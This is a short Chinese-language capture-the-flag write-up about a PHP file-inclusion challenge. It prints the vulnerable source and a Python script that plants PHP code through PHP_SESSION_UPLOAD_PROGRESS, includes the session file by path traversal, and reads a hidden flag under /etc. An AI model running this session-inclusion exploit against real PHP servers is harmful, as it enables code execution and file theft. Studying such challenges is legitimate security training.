这题关键解法也很脑洞,感觉国赛的题目都要去扫目录的一堆非常规的敏感文件.....
Copy <? php
highlight_file ( __FILE__ ) ;
echo "your flag is in some file in /etc " ;
$fielf = $_POST[ "field" ];
$cf = "/tmp/app_auth/cfile/" . $_POST[ 'cf' ];
if ( file_exists ( $cf ) ){
include $cf;
echo $$field;
exit ;
}
else {
echo "" ;
exit ;
}
?>
比较诡异的是读进来的$fielf变量没用,反而用了$field变量,不经让人怀疑是不是出题人写错了orz,客服后面又没回,虽然最后我们还是凹出来了,但是还是很不爽
然后发现有个文件叫you_can_seeeeeeee_me.php,可以拿到phpinfo,发现了session.save_path,这玩意被出题人改成了不规则字母,有很明显的手动添加痕迹。
Copy import requests
import threading
import io
def post () :
sessid = '2846ee569600018f0cf748bf66edd8dc'
session = requests . session ()
while True :
response = session . post (
url = 'http://124.71.230.240:25934' ,
data = {
'PHP_SESSION_UPLOAD_PROGRESS' : "<?php var_dump(scandir('/etc/ehcfcbcedi/ecebdbacbd/eaidcddbbi/edfgdffeaf/eeahaeffac/fl444444g'));?>" ,
'cf' : f '../../../../var/lib/php/sessions/figceadcfh/sess_{sessid}' } ,
cookies = { 'PHPSESSID' : f '{sessid}' } ,
files = { "file" : ( 'tmp.txt' , '' )}
)
# response = requests.post(url='http://124.71.230.240:25934', data=data, cookies=cookies)
# print(response.text)
if '..' in response . text:
print ( response . text )
exit ()
def flag () :
url = 'http://124.71.230.240:25934'
data = { 'cf' : '../../../../etc/ehcfcbcedi/ecebdbacbd/eaidcddbbi/edfgdffeaf/eeahaeffac/fl444444g' }
response = requests . post ( url = url , data = data )
print ( response . text )
flag ()
# for i in range(128):
# thread = threading.Thread(target=post)
# thread.start()